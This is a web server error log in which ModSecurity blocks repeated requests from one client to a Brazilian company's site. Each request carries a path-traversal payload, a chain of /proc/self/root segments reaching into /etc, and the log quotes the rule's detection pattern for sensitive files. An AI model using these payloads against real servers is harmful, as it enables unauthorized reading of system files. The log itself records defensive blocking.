[Wed Mar 18 02:52:49.473883 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:40770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9sdY0UrI5A3LftIxIFwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:52:51.451937 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:40784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9s-yqAr6etmhZHNpwggAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:52:58.068556 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:46310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9uuyqAr6etmhZHNpwhgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:52:59.069810 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53530] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:52:59.823680 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:46316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9u-yqAr6etmhZHNpwiwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:01.767754 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:46324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9vcdf6f5d65gmYZSI9wAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:03.750338 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:46330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9v0zinOy1jxa1j4fKLgAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:05.384088 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:46344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9weoXxyEfFpUF8f8lpgAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:07.025500 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:46356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9w8df6f5d65gmYZSI-QAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:08.671156 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:41560] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9xMdf6f5d65gmYZSI_AAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:10.677635 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:41566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9xuoXxyEfFpUF8f8lqAAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:13.235479 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:41570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9yNY0UrI5A3LftIxIJQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:14.657031 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:41578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9yuw_le52K8_3pV2YNAAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:19.085605 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:60650] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo9zymAPhZkrhU8w4knCAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:20.801358 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:60654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo90NY0UrI5A3LftIxIJwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:21.034363 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53822] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:53:22.463615 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:60658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo90imAPhZkrhU8w4knDQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:24.064536 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:60674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo91EzinOy1jxa1j4fKNwAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:24.577907 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:56442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo91OyqAr6etmhZHNpwngAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:25.671610 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:60682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo91da6ubjKNq_cu4ZOJAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:53:27.315054 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:33408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo919Y0UrI5A3LftIxIKgAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:28.574019 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:33408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo92NY0UrI5A3LftIxIKwAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:53:30.738028 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:33420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo92ta6ubjKNq_cu4ZOKQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 02:53:32.375324 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:33432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo93Pu8EFLIOrSqIpvAMAAAAlU"], referer: 